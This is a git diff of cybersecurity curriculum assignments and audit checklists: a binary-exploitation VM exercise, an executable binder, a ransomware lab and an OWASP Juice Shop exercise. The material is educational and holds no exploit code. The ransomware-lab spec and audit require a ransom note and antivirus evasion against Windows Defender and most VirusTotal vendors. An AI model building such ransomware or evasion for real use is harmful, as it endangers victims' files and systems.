-You can find more details in a `README.txt` file inside each exercise folder.
+> Ensure the VM is installed and properly configured for the audit.
+
+#### Access:
+
+Log in using the following credentials:
+
+- **Username**: `user`
+- **Password**: `user`
+
+#### The Challenges
+
+Navigate to `/opt/hole-in-bin` and review the binaries. Each folder contains:
+
+- A binary file for exploitation.
+- A `README.txt` file explaining the exercise requirements and providing hints.
 
 Your task is to exploit these binaries, following ethical hacking guidelines.
 
-> Using a decompiler is forbidden, use a disassembler instead of it!
+### Guidelines
+
+- **Allowed Tools**:
+
+  - Debuggers/Disassembler: Ghidra, GDB, PEDA
+  - Scripting: Python, Bash
+
+- **Prohibited**:
+  - Automated external scripts or tools for exploitation.
+  - Decompiler.
 
-- The compiler is used to convert high-level programming language code into machine language code.
+> Using a Decompiler is forbidden, use a Debuggers/Disassembler instead of it!
+
+- The disassembler is a computer program that translates machine language into assembly language.
 - The assembler converts assembly-level language code into machine language code.
 
-> ⚠️ These methods and tools are for educational purposes only, so that you have a better understanding of how to protect against similar vulnerabilities. You must ensure that you do not attempt any exploit-type activity without the explicit permission of the owner of the machine, system or application. Failure to obtain permission risks breaking the law.
+### Documentation
+
+Create a `README.md` file that includes:
+
+1. **Challenge Walkthroughs**:
+
+   - Step-by-step explanation of how you exploited each binary.
+   - Tools and commands used.
+   - Key takeaways for each challenge.
+
+2. **Remediation Suggestions**:
+
+   - Practical steps to fix or mitigate the identified vulnerabilities.
+
+3. **Ethical Hacking Report**:
+   - Importance of proper authorization.
+   - Legal and ethical boundaries.
+   - Responsible disclosure practices.
+
+### Bonus
+
+If you complete the mandatory part successfully, and you still have free time, you can implement anything that you feel deserves to be a bonus, for example:
 
-### Submission and audit
+- **Exploring Alternative Exploitation Paths**: Document different approaches to solving the challenges.
 
-Files that must be inside your repository:
+Challenge yourself!
 
-- A `README.md` file, Which explains all the steps you went through to bypass each exercise.
-- All tools you use, and any scripts you write.
+### Ethical and Legal Considerations
+
+This project is strictly for educational purposes. All testing must be conducted in the provided VM environment. Unauthorized attempts to exploit vulnerabilities on live systems or networks are illegal and unethical.
+
+> ⚠️ **Disclaimer**: This project is for learning purposes only. Adhere to ethical hacking practices and legal standards. Misuse of these techniques is prohibited.
+
+### Submission and Audit
+
+Submit the following:
+
+- `README.md` with your walkthrough and vulnerability report email.
+- Any scripts or files used during the project.
+
+Ensure VirtualBox is installed for the audit.
 
 > It's forbidden to use external scripts, in the audit you will be asked different questions about the concepts and the practices of this project, prepare yourself!
-> It's is forbidden to use `strings` command.
+
+### Resources
+
+Some useful resources:
+
+- [HackTricks - Binary Exploitation](https://book.hacktricks.xyz/binary-exploitation): A detailed guide to binary exploitation techniques.
+- [Radare2](https://radare.org/n/radare2.html): An open-source framework for reverse engineering and analyzing binaries.
+- [Ghidra](https://ghidra-sre.org/): A software reverse engineering suite developed by the NSA.
+- [GDB Documentation](https://www.gnu.org/software/gdb/documentation/): Official GNU Debugger documentation.
diff --git a/subjects/cybersecurity/hole-in-bin/audit/README.md b/subjects/cybersecurity/hole-in-bin/audit/README.md
index f94a36e06..bcd2fb28a 100644
--- a/subjects/cybersecurity/hole-in-bin/audit/README.md
+++ b/subjects/cybersecurity/hole-in-bin/audit/README.md
@@ -2,58 +2,98 @@
 
 ##### Check the Repo content:
 
-- A `README.md` file, Which explains all the steps to bypass all exercises.
-- All used tools and scripts.
+- A `README.md` file that explains all the steps taken to bypass the challenges in the project.
+- All tools and scripts used, including their purpose and implementation.
 
-###### Are all the required files present?
+###### Are all the required files present in the repository?
+
+##### Play the Role of a Stakeholder
+
+Conduct a simulated scenario where the student plays the role of a **Security Analyst** presenting their findings to a team of stakeholders (auditors). Evaluate their understanding, communication skills, and depth of knowledge. Suggested questions include:
+
+- How did you analyze and exploit the binaries?
+- What vulnerabilities did you identify, and what is their impact?
+- What tools and techniques did you use for exploitation?
+- How would you recommend mitigating these vulnerabilities?
+- How did you ensure adherence to ethical guidelines?
+
+###### Did the student demonstrate a thorough understanding of the project and concepts?
+
+###### Was the student able to communicate effectively and explain their findings?
+
+###### Did the student discuss the real-world implications and propose practical solutions?
+
+##### Review the Student's `README.md` File:
+
+Verify that the documentation contains:
+
+1. **Challenge Walkthroughs**:
+
+   - Step-by-step explanation of how you exploited each binary.
+   - Tools and commands used.
+   - Key takeaways for each challenge.
+
+2. **Remediation Suggestions**:
+
+   - Practical steps to fix or mitigate the identified vulnerabilities.
+
+3. **Ethical Hacking Report**:
+   - Importance of proper authorization.
+   - Legal and ethical boundaries.
+   - Responsible disclosure practices.
+
+###### Is the documentation clear, well-structured, and complete?
+
+###### Does the documentation reflect the student's thought process and understanding?
 
 ##### Set up the virtual machine:
 
-1. Download the virtual machine image [hole-in-bin.ova](https://assets.01-edu.org/cybersecurity/hole-in-bin/hole-in-bin.ova).
-   For machine using Apple Silicon or equivalent get [hole-in-bin.utm.zip](https://assets.01-edu.org/cybersecurity/hole-in-bin/hole-in-bin.utm.zip).
-   This image contains all the binaries you will need for the audit.
+1. Download the virtual machine image:
 
-SHA1 for `hole-in-bin.ova`: 7db09b7a8fdfe25c286561dfa7ca5b50718bd60c
-SHA1 for `hole-in-bin.utm.zip`: fc93533b2054d10d03b09d53c223e57bf7ac7b62
+   - [hole-in-bin.ova](https://assets.01-edu.org/cybersecurity/hole-in-bin/hole-in-bin.ova)
+   - For machines using Apple Silicon or ARM architecture, use [hole-in-bin.utm.zip](https://assets.01-edu.org/cybersecurity/hole-in-bin/hole-in-bin.utm.zip)
 
-> If it's already downloaded in the student machine, please check the SHA1 running the following command
+2. Ensure the SHA1 checksums match:
+   - SHA1 for `hole-in-bin.ova`: `7db09b7a8fdfe25c286561dfa7ca5b50718bd60c`
+   - SHA1 for `hole-in-bin.utm.zip`: `fc93533b2054d10d03b09d53c223e57bf7ac7b62`
 
 ```console
 $ sha1sum <filename>
 <SHA1>
 ```
 
-2. Load the virtual machine image into your virtualization software of choice (e.g., VirtualBox, VMWare).
+2. Load the VM into the virtualization software (e.g., VirtualBox, UTM).
 
-3. Login using the provided credentials (username: user, password: user).
+3. Confirm successful login with the provided credentials:
+   - **Username**: `user`
+   - **Password**: `user`
 
-##### Ask the student to disassemble and explain the binaries:
+###### Is the VM properly configured and running?
 
-> Using a decompiler is forbidden, use a disassembler instead of it!
+##### Disassemble and Explain the Binaries:
 
-- The compiler is used to convert high-level programming language code into machine language code.
+- The disassembler is a computer program that translates machine language into assembly language.
 - The assembler converts assembly-level language code into machine language code.
 
-###### Was the student capable to disassemble the binaries?
-
-###### Was the student capable to explain the functionality of all the binaries?
+> **Note:** Decompilers are not allowed. Students must use disassemblers to analyze the binaries.
 
-###### Has the student shown the ability to understand and analyze binary structures and operations?
+###### Has the student successfully disassembled all the binaries?
 
-###### Did the student showcase an understanding of reverse engineering concepts?
+###### Can the student explain the purpose and functionality of the binaries?
 
-##### Ask the student to exploit the binaries:
+###### Did the student demonstrate an understanding of reverse engineering principles and binary mechanics?
 
-> It's forbidden to use external scripts!
+##### Exploit the Binaries:
 
-###### Have all binaries been exploited successfully?
+1. Analyze and exploit each binary according to the guidelines.
+2. Students must not use external scripts or tools for automated exploitation.
 
-###### Did the student demonstrate an understanding of various binary exploitation techniques?
+###### Did the student successfully exploit all the binaries?
 
-##### Check the student Documentation:
+###### Did the student demonstrate a clear understanding of binary exploitation techniques?
 
-###### Is the documentation clear and complete, including well-structured explanations and thorough descriptions?
+#### Bonus:
 
-###### Did the student explain their thought process and approach to each challenge?
+###### + Did the student explore alternative exploitation paths and document them?
 
-###### Have the student’s notes clearly described the tools and techniques used during the exercise?
+###### + Is this project an outstanding project that exceeds the basic requirements?
diff --git a/subjects/cybersecurity/merge/README.md b/subjects/cybersecurity/merge/README.md
new file mode 100644
index 000000000..b2212a13a
--- /dev/null
+++ b/subjects/cybersecurity/merge/README.md
@@ -0,0 +1,104 @@
+## Merge
+
+<center>
+<img src="pictures/merge-meme.jpg" style="width: 414px; height: auto;">
+</center>
+
+### Introduction
+
+Executable files play a vital role in software development and system operations. By analyzing binary headers and modifying executable behavior, we can gain a deeper understanding of how operating systems handle executables. In this project, you will develop a **binder**, a tool that merges two executable programs into one, providing insight into executable file structures and entry points.
+
+### Objective
+
+The goal of this project is to develop a binary binder that merges two executable programs into a single executable. This will help you:
+
+- Understand executable file formats and their structures (e.g., ELF, PE, Mach-O).
+- Learn about entry points and program execution flow.
+- Gain experience in low-level programming and file manipulation.
+- Enhance debugging and reverse engineering skills.
+
+### Role Play
+
+As part of the project, you will participate in a role-play session where you will act as a **Binary Analyst** presenting your findings to a hypothetical team of stakeholders. Be prepared to:
+
+- Explain the structure of the executable file formats you used.
+- Demonstrate how your binder program works and its potential applications.
+- Discuss the ethical considerations and legal implications of binary modification.
+- Provide recommendations for securing executable files against tampering.
+
+### Project Requirements
+
+#### Setup and Environment
+
+Choose a Linux operating system. Ensure you have the necessary tools and libraries for binary analysis and manipulation.
+
+#### The Challenge
+
+Using a programming language from your choice create a program that merges two executable files into one.
+Ensure that the output executable runs both programs seamlessly and manages the execution flow to preserve the functionality of both programs.
+
+##### Usage Examples
+
+```sh
+$> ./bin1
+Message from bin1
+
+$> ./bin2
+Message from bin2
+
+$> ./merge
+Welcome to the merge program.
+Usage: ./merge source-binary1 source-binary2 -o output-binary
+
+$> ./merge bin1 bin2 -o bin3
+bin1 and bin2 merged into bin3 successfully!
+
+$> ./bin3
+Message from bin1
+Message from bin2
+```
+
+### Documentation
+
+Create a `README.md` file that includes:
+
+- **Explanation of the Binder**: Provide a detailed explanation of how your program works.
+- **Walkthrough**: Describe the step-by-step process of merging binaries.
+- **Binary File Structure**: Include your analysis of the target binary file format.
+- **Usage Instructions**: Provide clear instructions on how to use your program.
+- **Ethical and Legal Report**: Discuss the ethical responsibilities and legal considerations of binary modification.
+
+### Bonus
+
+If you complete the mandatory part successfully, and you still have free time, you can implement anything that you feel deserves to be a bonus, for example:
+
+- **Support for Multiple Formats**: Extend your binder to support multiple executable formats (e.g., ELF, PE, Mach-O).
+- **Advanced Execution Flow**: Let the user define the order and conditions for executing the merged programs.
+- **Graphical Interface**: Develop a simple GUI for merging executables.
+
+Challenge yourself!
+
+### Ethical and Legal Considerations
+
+You are responsible for following ethical guidelines when analyzing and modifying binaries. Do not use these techniques on unauthorized systems or software. Misuse of these techniques is strictly prohibited and may violate local laws.
+
+> ⚠️ Disclaimer: This project is for educational purposes only. Unauthorized use of these techniques is prohibited and may be illegal.
+
+### Submission and Audit
+
+Submit the following:
+
+- The source code of your binder program.
+- `README.md` containing your explanation, walkthrough, and ethical considerations.
+- The test cases to demonstrate the merging of two simple programs.
+
+Ensure the necessary tools and environment are installed for the audit.
+
+### Resources
+
+Some useful resources:
+
+- [File Binder](https://en.wikipedia.org/wiki/File_binder): Introduction to file binders.
+- [Executable File Formats](https://en.wikipedia.org/wiki/Executable_and_Linkable_Format): Learn about ELF, PE, and Mach-O file formats.
+- [Entry Point](https://en.wikipedia.org/wiki/Entry_point): Understand how programs start execution.
+- [Hex Editors and Debuggers](https://hexed.it/): A tool for analyzing and editing binary files.
diff --git a/subjects/cybersecurity/merge/audit/README.md b/subjects/cybersecurity/merge/audit/README.md
new file mode 100644
index 000000000..4f9607c0c
--- /dev/null
+++ b/subjects/cybersecurity/merge/audit/README.md
@@ -0,0 +1,97 @@
+#### General
+
+##### Check the Repo Content
+
+Files that must be present in the repository:
+
+- `README.md` containing your explanation, walkthrough, and ethical considerations.
+- The source code of your binder program.
+- The test cases to demonstrate the merging of two simple programs.
+
+###### Are all the required files present?
+
+##### Play the Role of a Stakeholder
+
+Conduct a simulated scenario where the student plays the role of a **Binary Analyst** presenting their findings to a team of stakeholders (auditors). Evaluate their understanding, communication skills, and depth of knowledge. Suggested questions include:
+
+- Can you explain the structure of the executable file formats you worked with?
+- How does your binder program work, and what are its potential applications?
+- What are the ethical considerations and legal implications of binary modification?
+- How would you recommend securing executable files against tampering?
+
+###### Did the student demonstrate a thorough understanding of the project and concepts?
+
+###### Did the student discuss the potential real-world applications and implications of their program?
+
+###### Was the student able to justify the recommendations for securing binaries?
+
+##### Review the Student Documentation
+
+Verify that the `README.md` file contains:
+
+- **Explanation of the Binder**: Provide a detailed explanation of how your program works.
+- **Walkthrough**: Describe the step-by-step process of merging binaries.
+- **Binary File Structure**: Include your analysis of the target binary file format.
+- **Usage Instructions**: Provide clear instructions on how to use your program.
+- **Ethical and Legal Report**: Discuss the ethical responsibilities and legal considerations of binary modification.
+
+###### Does the `README.md` file include a complete and clear explanation of the binder?
+
+###### Is the walkthrough detailed and easy to follow?
+
+###### Does the documentation provide an analysis of the binary file structure?
+
+###### Are ethical and legal considerations discussed comprehensively?
+
+##### Test the Challenge
+
+Verify that the student can:
+
+```sh
+$> ./bin1
+Message from bin1
+
+$> ./bin2
+Message from bin2
+
+$> ./merge
+Welcome to the merge program.
+Usage: ./merge source-binary1 source-binary2 -o output-binary
+
+$> ./merge bin1 bin2 -o bin3
+bin1 and bin2 merged into bin3 successfully!
+
+$> ./bin3
+Message from bin1
+Message from bin2
+```
+
+1. **Run the Binder Program**:
+
+- Ask the student to merge two binaries into one using their binder program.
+- Verify that the program executes without errors and generates the merged binary.
+
+2. **Execute the Merged Binary**:
+
+- Confirm that the merged binary runs both programs seamlessly.
+- Verify the execution flow preserves the functionality of both binaries.
+
+3. **Analyze Binary File Structure**:
+
+- Ask the student to explain the binary file formats they worked with and how the binder modifies the file headers and entry points.
+
+###### Did the student successfully run the binder program and generate the merged binary?
+
+###### Does the merged binary execute both programs as expected?
+
+###### Was the student able to analyze and explain the structure of the binary file formats?
+
+##### Bonus
+
+###### + Did the student extend the binder to support multiple executable formats (e.g., ELF, PE, Mach-O)?
+
+###### + Did the student implement advanced execution flow control (e.g., user-defined order or conditions for execution)?
+
+###### + Did the student create a graphical interface for the binder program?
+
+###### + Is this project an outstanding project that exceeds the basic requirements?
diff --git a/subjects/cybersecurity/merge/pictures/merge-meme.jpg b/subjects/cybersecurity/merge/pictures/merge-meme.jpg
new file mode 100644
index 000000000..25648dda0
Binary files /dev/null and b/subjects/cybersecurity/merge/pictures/merge-meme.jpg differ
diff --git a/subjects/cybersecurity/ransomware-lab/README.md b/subjects/cybersecurity/ransomware-lab/README.md
new file mode 100644
index 000000000..5bbfb57b5
--- /dev/null
+++ b/subjects/cybersecurity/ransomware-lab/README.md
@@ -0,0 +1,103 @@
+## Ransomware-Lab
+
+<center>
+<img src="pictures/ransomware-lab.jpg" style="width: 560px; height: auto;">
+</center>
+
+### Introduction
+
+To effectively defend against ransomware attacks, it’s essential to understand their mechanics. This project challenges you to think like a black hat and develop a controlled ransomware simulation. By creating both encryption and decryption programs, you’ll gain insight into how ransomware like WannaCry operates.
+
+This exercise is conducted in a secure virtual machine environment to ensure safety and controlled experimentation.
+
+### Objective
+
+The goal of this project is to develop a ransomware simulation and a corresponding decryption tool to understand ransomware mechanics. By completing this project, you will:
+
+- Learn the core principles of file encryption and decryption.
+- Understand how ransomware manipulates files and affects systems.
+- Gain hands-on experience in developing secure cryptographic programs.
+- Enhance your understanding of how to defend against such attacks in real-world scenarios.
+
+### Role Play
+
+As part of the project, you will participate in a role-play session where you act as a **Malware Developer** presenting your ransomware simulation to a team of stakeholders. Be prepared to:
+
+- Explain the design and functionality of your ransomware and decryption tool.
+- Discuss how ransomware can bypass antivirus detection and the challenges involved.
+- Analyze the ethical considerations and potential risks of working with ransomware simulations.
+- Provide recommendations for improving ransomware detection and system security.
+
+### Project Requirements
+
+#### Setup and Environment
+
+- Set up a Windows-based virtual machine for development and testing.
+
+> Ensure that the environment is isolated to prevent accidental damage or spread of the ransomware!
+
+#### The Challenge
+
+1. **Ransomware Development**:
+
+   - Develop a ransomware program that encrypts all files.
+   - Place a text file on the desktop with the following message:
+     ```
+     All of your files have been encrypted.
+     To unlock them, contact me with your encryption code at email@email.com.
+     Your encryption code is: {randomly_generated_code}
+     ```
+   - Generate a unique random encryption code for each affected system.
+
+2. **Decryption Program**:
+
+   - Develop a decryption program that uses the encryption code to restore the encrypted files.
+   - Ensure the decryption program works reliably for each affected system based on their encryption code.
+
+3. **Detection Avoidance**:
+   - Your ransomware program must use advanced techniques to avoid detection by antivirus software.
+   - Ensure the ransomware bypasses detection in **Windows Defender** and more than 80% of security vendors on [VirusTotal](https://www.virustotal.com/).
+
+### Documentation
+
+Create a `README.md` file that includes:
+
+- **Ransomware Program Overview**: Explain how your program works and its intended functionality.
+- **Decryption Program Overview**: Describe how the decryption program works and how it interacts with the encryption tool.
+- **Technical Explanation**: Provide details on the encryption algorithm used, how the encryption code is generated, and how files are decrypted.
+- **Testing and Usage Instructions**: Include clear instructions for testing the ransomware and decryption tools in the virtual machine.
+- **Ethical and Legal Report**: Discuss the ethical responsibilities of developing ransomware simulations and the importance of using such knowledge to improve security defenses.
+
+### Bonus
+
+If you complete the mandatory part successfully, and you still have free time, you can implement additional features, such as:
+
+- **Multiple File Type Support**: Expand the ransomware to encrypt multiple file types (e.g., images, videos).
+- **Stealth Techniques**: Implement advanced techniques to improve ransomware stealth.
+- **Custom Encryption Algorithms**: Develop your encryption algorithm for enhanced security.
+
+Challenge yourself!
+
+### Ethical and Legal Considerations
+
+You are responsible for ensuring all ransomware testing is conducted within a secure, isolated environment. Do not use or share ransomware outside of this project. Misuse of these techniques is strictly prohibited and may violate local laws.
+
+> ⚠️ Disclaimer: This project is for educational purposes only. Unauthorized use of these techniques is prohibited and may be illegal.
+
+### Submission and Audit
+
+Submit the following:
+
+- Source code for both the ransomware and decryption programs.
+- `README.md` file with detailed documentation.
+
+Ensure VirtualBox or equivalent software is installed for the audit.
+
+### Resources
+
+Some useful resources:
+
+- [Windows Cryptographic Functions](https://docs.microsoft.com/en-us/windows/win32/api/bcrypt/): Learn about cryptographic APIs in Windows.
+- [File Management Functions](https://docs.microsoft.com/en-us/windows/win32/fileio/file-management-functions): Understand file manipulation in Windows.
+- [VirusTotal](https://www.virustotal.com/): Check your ransomware against antivirus detections.
+- [Microsoft Security Basics](https://docs.microsoft.com/en-us/windows/security/): Learn about Windows security features.
diff --git a/subjects/cybersecurity/ransomware-lab/audit/README.md b/subjects/cybersecurity/ransomware-lab/audit/README.md
new file mode 100644
index 000000000..38072f56e
--- /dev/null
+++ b/subjects/cybersecurity/ransomware-lab/audit/README.md
@@ -0,0 +1,86 @@
+#### General
+
+##### Check the Repo Content
+
+Files that must be present in the repository:
+
+- Source code for both the ransomware and decryption programs.
+- Detailed documentation in the `README.md` file containing program overviews, technical explanations, testing instructions, and ethical considerations.
+
+###### Are all the required files present?
+
+##### Play the Role of a Stakeholder
+
+Conduct a simulated scenario where the student acts as a **Malware Developer** presenting their ransomware simulation to a hypothetical team of stakeholders. Evaluate their understanding, communication skills, and depth of knowledge. Suggested questions include:
+
+- What is ransomware, and how does it operate on a system?
+- How does your ransomware encrypt files and generate the unique encryption code?
+- How does your decryption program restore the encrypted files?
+- What techniques did you use to bypass antivirus detections?
+- What ethical considerations should be addressed when working with ransomware simulations?
+
+###### Did the student demonstrate a thorough understanding of ransomware mechanics and encryption techniques?
+
+###### Was the student able to communicate effectively and explain their programs?
+
+###### Did the student discuss the ethical and real-world implications of ransomware?
+
+###### Was the student able to justify their program’s design and implementation?
+
+##### Review the Student Documentation
+
+Verify that the `README.md` file contains:
+
+- **Ransomware Program Overview**: Explanation of how the ransomware operates.
+- **Decryption Program Overview**: Description of how the decryption program restores encrypted files.
+- **Technical Explanation**: Details about encryption, code generation, and decryption logic.
+- **Testing and Usage Instructions**: Clear steps for safely testing the ransomware and decryption tools in a secure environment.
+- **Ethical and Legal Report**: Discussion of ethical responsibilities and legal considerations.
+
+###### Does the documentation provide a clear and complete overview of the ransomware and decryption programs?
+
+###### Are the technical details of encryption and decryption well-explained?
+
+###### Does the documentation highlight the importance of ethical and legal practices?
+
+##### Check the detection avoidance
+
+Scan the ransomware program in **Windows Defender** and **VirusTotal**.
+
+###### Does the ransomware bypass detection in Windows Defender?
+
+###### Does the ransomware bypass detection in more than 80% of security vendors on VirusTotal?
+
+##### Check the file encryption
+
+Create files with random data in the virtual machine and run the ransomware program.
+
+###### Does the ransomware encrypt all files in the specified directory or with the targeted extension?
+
+###### Does the ransomware create a text file on the desktop with the encryption code and contact information?
+
+##### Check the file decryption
+
+- Ask the student to provide the decryption program for testing.
+- Run the decryption program using the encryption code.
+
+###### Does the decryption program successfully restore all encrypted files?
+
+##### Manual Verification:
+
+Ask the student to explain how the encryption code is generated and used.
+Verify that the encryption code is random and unique for each affected system.
+
+###### Is the encryption code unique for each affected system?
+
+###### Is the encryption code generation method random and effective?
+
+#### Bonus
+
+###### + Did the student extend the ransomware functionality to support multiple file types?
+
+###### + Did the student implement advanced stealth techniques?
+
+###### + Did the student develop a custom encryption algorithm?
+
+###### + Is this project an outstanding submission that exceeds the basic requirements?
diff --git a/subjects/cybersecurity/ransomware-lab/pictures/ransomware-lab.jpg b/subjects/cybersecurity/ransomware-lab/pictures/ransomware-lab.jpg
new file mode 100644
index 000000000..a68a6e0fd
Binary files /dev/null and b/subjects/cybersecurity/ransomware-lab/pictures/ransomware-lab.jpg differ
diff --git a/subjects/cybersecurity/vuln-hunter/README.md b/subjects/cybersecurity/vuln-hunter/README.md
new file mode 100644
index 000000000..5ed235459
--- /dev/null
+++ b/subjects/cybersecurity/vuln-hunter/README.md
@@ -0,0 +1,125 @@
+## VulnHunter: OWASP Juice Shop Web Vulnerability Exploration
+
+<center>
+<img src="resources/owasp-logo.png" style="width: 922px; height: 282px;">
+</center>
+
+### Introduction
+
+OWASP Juice Shop is an intentionally vulnerable web application used for security training, awareness, and ethical hacking practice. It covers many web vulnerabilities from the **OWASP Top 10** security risks. In this project, you will explore common web vulnerabilities by identifying, exploiting, and documenting them in a safe and controlled environment.
+
+### Objective
+
+The goal of this project is to help you gain hands-on experience in finding and exploiting web vulnerabilities. You will learn about and attempt to exploit various vulnerabilities such as **SQL Injection**, **Cross-Site Scripting (XSS)**, and **Insecure Authentication** within the Juice Shop web application.
+
+By completing this project, you will:
+
+- Develop a deep understanding of OWASP Top 10 vulnerabilities.
+- Learn ethical hacking techniques and how to exploit web vulnerabilities safely.
+- Gain experience in security testing and penetration testing methodologies.
+- Understand the ethical implications and responsibilities of security testing.
+
+### Role Play
+
+As part of the project, you will participate in a role-play session where you will assume the role of a **Security Consultant** or **Penetration Tester**. In this session, you will present your findings to a hypothetical team of stakeholders (auditors) and explain the vulnerabilities you discovered, their impact, and how to fix them.
+
+The goal of the role-play session is to:
+
+- Assess your understanding of the vulnerabilities and how you exploited them.
+- Test your ability to explain complex technical issues in a clear and concise way.
+- Challenge you to think critically about the security measures and improvements you suggested.
+- Evaluate your ethical considerations when performing security testing and how you approached legal boundaries.
+
+You should be ready to answer questions such as:
+
+- What vulnerabilities did you discover, and why are they important?
+- How did you exploit each vulnerability? Can you demonstrate this process?
+- What would be the real-world impact of these vulnerabilities if left unpatched?
+- How would you recommend fixing the issues? What security measures should be put in place?
+- What were the ethical and legal concerns during your testing process, and how did you ensure responsible vulnerability disclosure?
+
+Prepare to explain your findings, the techniques you used, and your remediation recommendations as if you were speaking to a real client or development team. The role-play session will be a key part of your project evaluation.
+
+### Project Requirements
+
+#### Setup and Installation
+
+You are required to set up the OWASP Juice Shop application using Docker. Follow the instructions below to set up Juice Shop:
+
+**Local Setup using Docker**:
+
+```sh
+docker pull bkimminich/juice-shop
+docker run --rm -p 3000:3000 bkimminich/juice-shop
+```
+
+Access the application at `http://localhost:3000`.
+
+For more information: https://hub.docker.com/r/bkimminich/juice-shop
+
+#### Vulnerability Challenges
+
+Once Juice Shop is up and running, you are required to find and exploit a minimum of **5 vulnerabilities** from the OWASP Top 10 list, such as:
+
+- **SQL Injection (SQLi)**: Exploit vulnerable SQL queries to bypass authentication or retrieve data.
+- **Cross-Site Scripting (XSS)**: Inject scripts into vulnerable input fields to perform malicious actions.
+- **Broken Authentication**: Identify weaknesses in user authentication mechanisms and attempt to gain unauthorized access.
+- **Insecure Direct Object Reference (IDOR)**: Access resources without proper authorization by exploiting insecure access controls.
+- **Cross-Site Request Forgery (CSRF)**: Perform actions on behalf of another user by exploiting insecure CSRF tokens.
+
+You will document each vulnerability you discover, explaining how you found and exploited it, the potential risks, and the steps to remediate it.
+
+#### Documentation
+
+Create a `README.md` file that contains the following:
+
+##### 1. Exploit Report
+
+For each vulnerability you find, submit an **Exploit Report** that includes:
+
+- **Vulnerability Type**: Identify the vulnerability (e.g., SQLi, XSS).
+- **How It Was Exploited**: Describe the step-by-step process of how you exploited the vulnerability.
+- **Impact**: Explain the potential impact of the vulnerability if exploited in a real-world scenario.
+- **Remediation**: Suggest ways to fix or mitigate the vulnerability.
+
+##### 2. Ethical Hacking Report
+
+In addition to your technical exploit report, submit an **Ethical Hacking Report** that discusses the ethical responsibilities when performing security testing. This report should cover the following points:
+
+- The importance of obtaining proper authorization before testing.
+- The legal and ethical boundaries of vulnerability testing.
+- How to report vulnerabilities responsibly and avoid causing harm.
+
+### Bonus
+
+If you complete the mandatory part successfully, and you still have free time, you can implement anything that you feel deserves to be a bonus, for example:
+
+- **Find Extra vulnerabilities** Find an extra 5 vulnerabilities or more.
+- **Automated Scanning**: Use **OWASP ZAP** or other security tools to automate the scanning of Juice Shop and identify vulnerabilities.
+- **Docker Analysis**: Analyze the Juice Shop Dockerfile and set up to identify any infrastructure-related vulnerabilities.
+
+### Ethical and Legal Considerations
+
+You are responsible for following the guidelines for ethical hacking. Make sure you only perform security testing in environments where you have explicit permission. Never perform unauthorized testing on live systems or personal accounts.
+
+> ⚠️ Disclaimer: This project is for educational purposes only. Ensure that all testing is done ethically and in accordance with legal standards. The institution is not responsible for the misuse of the techniques demonstrated.
+
+### Submission and Audit
+
+Upon completing this project, you should submit the following:
+
+- Your **README.md** file.
+- Any additional files or scripts used during the project.
+
+### Resources
+
+Some useful resources:
+
+- [OWASP Juice Shop GitHub Repository](https://github.com/juice-shop/juice-shop)
+- [OWASP Top 10 Vulnerabilities](https://owasp.org/www-project-top-ten/)
+- [OWASP ZAP (Zed Attack Proxy)](https://owasp.org/www-project-zap/)
+- [OWASP Juice Shop Documentation](https://owasp-juice.shop/)
+- [Hacksplaining OWASP Top 10](https://www.hacksplaining.com/owasp)
+- [OWASP Juice Shop Docker Image](https://hub.docker.com/r/bkimminich/juice-shop)
+
+Before asking for help, explore these resources to gain a better understanding of the Juice Shop project and web vulnerabilities.
diff --git a/subjects/cybersecurity/vuln-hunter/audit/README.md b/subjects/cybersecurity/vuln-hunter/audit/README.md
new file mode 100644
index 000000000..0033a2912
--- /dev/null
+++ b/subjects/cybersecurity/vuln-hunter/audit/README.md
@@ -0,0 +1,89 @@
+#### General
+
+##### Check the Repo Content
+
+Files that must be inside the repository:
+
+- Detailed documentation in the `README.md` file contains exploit reports and ethical hacking reports documenting the vulnerabilities found.
+
+###### Are all the required files present?
+
+##### Play the Role of a Stakeholder
+
+Organize a simulated scenario where the student takes on the role of a **Security Consultant** or **Penetration Tester** and explains their findings and reports to a team or stakeholder. Evaluate their grasp of the vulnerabilities, their remediation, communication skills, and critical thinking about the solutions provided.
+
+Suggested role-play questions include:
+
+- What vulnerabilities did you find, and why are they significant?
+- What methods did you use to exploit the vulnerabilities in OWASP Juice Shop?
+- How would these vulnerabilities impact a real-world web application?
+- What are the most common security controls that could prevent these types of attacks?
+- How would you explain the business impact of these vulnerabilities to a non-technical stakeholder?
+- How would you propose fixes for the vulnerabilities you found?
+
+###### Did the students demonstrate a thorough understanding of the vulnerabilities and their remediation?
+
+###### Were the students able to communicate effectively and justify their decisions?
+
+###### Did the students provide solutions that could be applied in a real-world environment?
+
+##### Check the Student Documentation and the Exploit Reports in the `README.md` File
+
+For each vulnerability report, ensure the following:
+
+1. **Vulnerability Type**:
+
+- Is the vulnerability correctly identified (e.g., SQL Injection, XSS, etc.)?
+
+2. **Steps to Exploit**:
+
+- Does the report clearly outline how the vulnerability was discovered and exploited?
+- Are the steps easy to follow and reproducible?
+
+3. **Impact**:
+
+- Does the report clearly explain the potential impact of the vulnerability on the web application?
+- Is the severity of the vulnerability assessed correctly?
+
+4. **Remediation**:
+
+- Are clear and actionable remediation steps provided?
+- Are the recommended fixes practical and aligned with security best practices?
+
+###### Are all the reported vulnerabilities in the README.md file respecting the questions above?
+
+###### Does the `README.md` file include the ethical hacking report that outlines the ethical responsibilities and legal considerations followed during the project?
+
+##### Ensure the student finds at least 5 vulnerabilities related to OWASP Top 10
+
+###### Did the students successfully find at least 5 vulnerabilities related to OWASP Top 10, such as:
+
+1. SQL Injection (SQLi)
+2. Cross-Site Scripting (XSS)
+3. Broken Authentication
+4. Insecure Direct Object Reference (IDOR)
+5. Cross-Site Request Forgery (CSRF)
+
+###### Were the vulnerabilities explained and exploited successfully?
+
+##### Demonstrate the vulnerabilities
+
+Ask the students to demonstrate their exploitation techniques and walk you through how they found and exploited the vulnerabilities.
+
+###### Can the students reproduce the vulnerability using their documented steps?
+
+###### Is the vulnerability successfully exploited in the demonstration?
+
+###### Can the students explain how their fix improves security?
+
+#### Bonus
+
+###### Did the student take on any bonus tasks?
+
+###### + Did the student identify and document an extra 5 vulnerabilities?
+
+###### + Did the student use **OWASP ZAP** or other automated tools for vulnerability scanning?
+
+###### + Did the student analyze the Dockerfile for potential infrastructure vulnerabilities?
+
+###### + Is this project an outstanding project that exceeds the basic requirements?
diff --git a/subjects/cybersecurity/vuln-hunter/resources/owasp-logo.png b/subjects/cybersecurity/vuln-hunter/resources/owasp-logo.png
new file mode 100644
index 000000000..14df9567c
Binary files /dev/null and b/subjects/cybersecurity/vuln-hunter/resources/owasp-logo.png differ